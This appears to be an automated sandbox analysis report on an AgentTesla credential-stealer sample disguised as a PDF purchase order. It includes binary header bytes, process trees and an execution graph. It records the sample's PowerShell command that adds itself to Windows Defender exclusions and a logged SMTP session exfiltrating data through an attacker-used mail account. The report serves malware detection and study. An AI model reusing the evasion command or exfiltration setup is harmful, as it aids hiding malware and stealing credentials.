                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 24%
                                      • Antivirus: Virustotal, Detection: 32%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+...............0..<...f.......Z... ...`....@.. ....................................@.................................yZ..O....`...d..........................X=..p............................................ ............... ..H............text....:... ...<.................. ..`.rsrc....d...`...d...>..............@..@.reloc..............................@..B.................Z......H.......Xk...E......5.......@............................................0............}.....s....}......}.....(.......(......{.....o.....(C........,b..{....r...po......r...po......{....(J......(....o......{.....o......{....r...po.......}.....8U......}.....{....r)..po......r)..po.....(C.....{.....oX......(....o......{.....oZ...o......{.....o^......(....o......{.....o\......(....o......{.....o`......(....o......{.....ob......(....o......u...........,H..{.....o......{....r...po.

                                      C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier

                                      Download File
                                      Process:C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.9475757386482515
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:PO-2024)bekotas.pdf.exe
                                      File size:959'488 bytes
                                      MD5:2226b8a2ac6e61dd5bc5327d48c74e1c
                                      SHA1:7b7b425df447fb64abfbf7fe34d336b13d8d8bb0
                                      SHA256:72629b026d1626923f7d3280d0dabb7c1a9ee869b7ce9ec2f02c949544c8326f
                                      SHA512:0560b84da47f73c13d9ee9762f1b53e88e4a87c7154e5203dbdafc50c18d502eaaa40a54dad91f0aa2164bcdbe16aa2b5d3bd97f1c8f3ae7c7e871067e04615a
                                      SSDEEP:24576:cca028CkoVwvyTIv+WSLFhnfksXOQcFez3aqmUY:cb3XwKTIv+TFRfksXvTY
                                      TLSH:FF1523725792CF51D43E4BFA8839A1511B31FC2E1031DA5FAD82F4EB59B27245AA0F23
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....+...............0..<...f.......Z... ...`....@.. ....................................@................................

                                      File Icon

                                      Icon Hash:66666667e69c310e

                                      Static PE Info

                                      General

                                      Entrypoint:0x4e5ace
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0xC92BF28A [Sun Dec 13 15:55:54 2076 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xe5a790x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xe60000x6400.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xee0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xe3d580x70.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xe3ad40xe3c0083dd652505cd57995e046e0389fedbeeFalse0.9713120026070252data7.976240450007284IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xe60000x64000x64003c3c9b21e50bfec32f3090f1b621ae07False0.3955078125data5.147657186895511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xee0000xc0x200c60ecbe4e86dc4887abce61a538903b3False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xe61e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.2701612903225806
                                      RT_ICON0xe64d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.4966216216216216
                                      RT_ICON0xe66100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5439765458422174
                                      RT_ICON0xe74c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.6656137184115524
                                      RT_ICON0xe7d800x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5021676300578035
                                      RT_ICON0xe82f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.3157676348547718
                                      RT_ICON0xea8b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4090056285178236
                                      RT_ICON0xeb9680x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.5859929078014184
                                      RT_GROUP_ICON0xebde00x76data0.6440677966101694
                                      RT_VERSION0xebe680x398OpenPGP Public Key0.4206521739130435
                                      RT_MANIFEST0xec2100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      07/03/24-09:49:42.787550TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity64941587192.168.2.5108.167.140.123
                                      07/03/24-09:49:42.787550TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil64941587192.168.2.5108.167.140.123
                                      07/03/24-09:49:42.787550TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M264941587192.168.2.5108.167.140.123
                                      07/03/24-09:49:42.787473TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity64941587192.168.2.5108.167.140.123
                                      07/03/24-09:49:42.787473TCP2030171ET TROJAN AgentTesla Exfil Via SMTP64941587192.168.2.5108.167.140.123

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 3, 2024 09:49:40.687561989 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:40.692384005 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:40.695355892 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:41.457690001 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:41.459357977 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:41.464198112 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:41.622400999 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:41.623624086 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:41.631064892 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:41.785621881 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:41.786469936 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:41.791352987 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:42.248657942 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:42.248914003 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:42.253968000 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:42.408921003 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:42.409084082 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:42.413857937 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:42.622764111 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:42.627125025 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:42.632019997 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:42.786854982 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:42.787472963 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:42.787549973 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:42.787580013 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:42.787580013 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:49:42.792321920 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:42.792445898 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:42.792490959 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:42.792500019 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:43.052591085 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:49:43.097894907 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:51:20.379566908 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:51:20.386789083 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:51:20.744268894 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:51:20.744282961 CEST58764941108.167.140.123192.168.2.5
                                      Jul 3, 2024 09:51:20.744335890 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:51:20.744441032 CEST64941587192.168.2.5108.167.140.123
                                      Jul 3, 2024 09:51:20.749212027 CEST58764941108.167.140.123192.168.2.5

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 3, 2024 09:48:46.543953896 CEST5354216162.159.36.2192.168.2.5
                                      Jul 3, 2024 09:48:47.234317064 CEST53593301.1.1.1192.168.2.5
                                      Jul 3, 2024 09:49:40.357806921 CEST6549653192.168.2.51.1.1.1
                                      Jul 3, 2024 09:49:40.680640936 CEST53654961.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jul 3, 2024 09:49:40.357806921 CEST192.168.2.51.1.1.10xc13fStandard query (0)mail.musabody.comA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jul 3, 2024 09:49:40.680640936 CEST1.1.1.1192.168.2.50xc13fNo error (0)mail.musabody.com108.167.140.123A (IP address)IN (0x0001)false

                                      SMTP Packets

                                      TimestampSource PortDest PortSource IPDest IPCommands
                                      Jul 3, 2024 09:49:41.457690001 CEST58764941108.167.140.123192.168.2.5220-gator4156.hostgator.com ESMTP Exim 4.96.2 #2 Wed, 03 Jul 2024 02:49:41 -0500
                                      220-We do not authorize the use of this system to transport unsolicited,
                                      220 and/or bulk e-mail.
                                      Jul 3, 2024 09:49:41.459357977 CEST64941587192.168.2.5108.167.140.123EHLO 571345
                                      Jul 3, 2024 09:49:41.622400999 CEST58764941108.167.140.123192.168.2.5250-gator4156.hostgator.com Hello 571345 [8.46.123.33]
                                      250-SIZE 52428800
                                      250-8BITMIME
                                      250-PIPELINING
                                      250-PIPECONNECT
                                      250-AUTH PLAIN LOGIN
                                      250-STARTTLS
                                      250 HELP
                                      Jul 3, 2024 09:49:41.623624086 CEST64941587192.168.2.5108.167.140.123AUTH login dmljdG9yaWFAbXVzYWJvZHkuY29t
                                      Jul 3, 2024 09:49:41.785621881 CEST58764941108.167.140.123192.168.2.5334 UGFzc3dvcmQ6
                                      Jul 3, 2024 09:49:42.248657942 CEST58764941108.167.140.123192.168.2.5235 Authentication succeeded
                                      Jul 3, 2024 09:49:42.248914003 CEST64941587192.168.2.5108.167.140.123MAIL FROM:<victoria@musabody.com>
                                      Jul 3, 2024 09:49:42.408921003 CEST58764941108.167.140.123192.168.2.5250 OK
                                      Jul 3, 2024 09:49:42.409084082 CEST64941587192.168.2.5108.167.140.123RCPT TO:<pritchardchristopher281@gmail.com>
                                      Jul 3, 2024 09:49:42.622764111 CEST58764941108.167.140.123192.168.2.5250 Accepted
                                      Jul 3, 2024 09:49:42.627125025 CEST64941587192.168.2.5108.167.140.123DATA
                                      Jul 3, 2024 09:49:42.786854982 CEST58764941108.167.140.123192.168.2.5354 Enter message, ending with "." on a line by itself
                                      Jul 3, 2024 09:49:42.787580013 CEST64941587192.168.2.5108.167.140.123.
                                      Jul 3, 2024 09:49:43.052591085 CEST58764941108.167.140.123192.168.2.5250 OK id=1sOukI-003o0R-2G
                                      Jul 3, 2024 09:51:20.379566908 CEST64941587192.168.2.5108.167.140.123QUIT
                                      Jul 3, 2024 09:51:20.744268894 CEST58764941108.167.140.123192.168.2.5221 gator4156.hostgator.com closing connection

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:0
                                      Start time:03:47:52
                                      Start date:03/07/2024
                                      Path:C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                                      Imagebase:0x760000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:3
                                      Start time:03:47:53
                                      Start date:03/07/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                                      Imagebase:0xb20000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:4
                                      Start time:03:47:53
                                      Start date:03/07/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:03:47:53
                                      Start date:03/07/2024
                                      Path:C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                                      Imagebase:0x7e0000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4459041571.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      General

                                      Target ID:6
                                      Start time:03:48:07
                                      Start date:03/07/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0xae0000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2167208545.0000000004024000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2167208545.0000000003FA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 24%, ReversingLabs
                                      • Detection: 32%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:03:48:08
                                      Start date:03/07/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x380000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:03:48:08
                                      Start date:03/07/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x780000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2228074088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2228074088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2231602205.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:03:48:16
                                      Start date:03/07/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0xd60000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2255092408.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2255092408.0000000004344000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2255092408.0000000004344000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:03:48:17
                                      Start date:03/07/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x820000
                                      File size:959'488 bytes
                                      MD5 hash:2226B8A2AC6E61DD5BC5327D48C74E1C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4457826484.0000000002BDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:10.1%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:10.1%
                                        Total number of Nodes:257
                                        Total number of Limit Nodes:12
                                        execution_graph 45485 11bd438 45486 11bd47e 45485->45486 45490 11bd618 45486->45490 45493 11bd608 45486->45493 45487 11bd56b 45496 11bb790 45490->45496 45494 11bd646 45493->45494 45495 11bb790 DuplicateHandle 45493->45495 45494->45487 45495->45494 45497 11bd680 DuplicateHandle 45496->45497 45498 11bd646 45497->45498 45498->45487 45570 11b4668 45571 11b467a 45570->45571 45572 11b4686 45571->45572 45574 11b4779 45571->45574 45575 11b479d 45574->45575 45579 11b4878 45575->45579 45583 11b4888 45575->45583 45581 11b4882 45579->45581 45580 11b498c 45581->45580 45587 11b44e0 45581->45587 45584 11b48af 45583->45584 45585 11b44e0 CreateActCtxA 45584->45585 45586 11b498c 45584->45586 45585->45586 45588 11b5918 CreateActCtxA 45587->45588 45590 11b59db 45588->45590 45590->45590 45499 4af11c8 45500 4af11fb 45499->45500 45501 4af1269 45500->45501 45502 4af15b0 ResumeThread 45500->45502 45502->45501 45269 4af2474 45274 4af407e 45269->45274 45281 4af4010 45269->45281 45287 4af4020 45269->45287 45270 4af2494 45275 4af400c 45274->45275 45277 4af4081 45274->45277 45293 4af4370 45275->45293 45313 4af4380 45275->45313 45333 4af43eb 45275->45333 45276 4af405e 45276->45270 45277->45270 45282 4af403a 45281->45282 45284 4af43eb 12 API calls 45282->45284 45285 4af4380 12 API calls 45282->45285 45286 4af4370 12 API calls 45282->45286 45283 4af405e 45283->45270 45284->45283 45285->45283 45286->45283 45288 4af403a 45287->45288 45290 4af43eb 12 API calls 45288->45290 45291 4af4380 12 API calls 45288->45291 45292 4af4370 12 API calls 45288->45292 45289 4af405e 45289->45270 45290->45289 45291->45289 45292->45289 45294 4af4395 45293->45294 45304 4af43a7 45294->45304 45354 4af4951 45294->45354 45359 4af4772 45294->45359 45365 4af49f3 45294->45365 45370 4af4653 45294->45370 45374 4af4cb3 45294->45374 45379 4af4796 45294->45379 45384 4af47f8 45294->45384 45389 4af45f8 45294->45389 45394 4af4b1c 45294->45394 45399 4af459d 45294->45399 45404 4af4585 45294->45404 45409 4af4e46 45294->45409 45414 4af4746 45294->45414 45419 4af4646 45294->45419 45423 4af44ca 45294->45423 45427 4af4b0b 45294->45427 45432 4af496f 45294->45432 45304->45276 45314 4af4395 45313->45314 45315 4af43a7 45314->45315 45316 4af496f 3 API calls 45314->45316 45317 4af4b0b 2 API calls 45314->45317 45318 4af44ca 2 API calls 45314->45318 45319 4af4646 ReadProcessMemory 45314->45319 45320 4af4746 2 API calls 45314->45320 45321 4af4e46 2 API calls 45314->45321 45322 4af4585 3 API calls 45314->45322 45323 4af459d 3 API calls 45314->45323 45324 4af4b1c 2 API calls 45314->45324 45325 4af45f8 2 API calls 45314->45325 45326 4af47f8 2 API calls 45314->45326 45327 4af4796 4 API calls 45314->45327 45328 4af4cb3 3 API calls 45314->45328 45329 4af4653 2 API calls 45314->45329 45330 4af49f3 2 API calls 45314->45330 45331 4af4772 2 API calls 45314->45331 45332 4af4951 3 API calls 45314->45332 45315->45276 45316->45315 45317->45315 45318->45315 45319->45315 45320->45315 45321->45315 45322->45315 45323->45315 45324->45315 45325->45315 45326->45315 45327->45315 45328->45315 45329->45315 45330->45315 45331->45315 45332->45315 45334 4af438e 45333->45334 45335 4af43f6 45333->45335 45336 4af496f 3 API calls 45334->45336 45337 4af4b0b 2 API calls 45334->45337 45338 4af44ca 2 API calls 45334->45338 45339 4af4646 ReadProcessMemory 45334->45339 45340 4af4746 2 API calls 45334->45340 45341 4af4e46 2 API calls 45334->45341 45342 4af4585 3 API calls 45334->45342 45343 4af459d 3 API calls 45334->45343 45344 4af4b1c 2 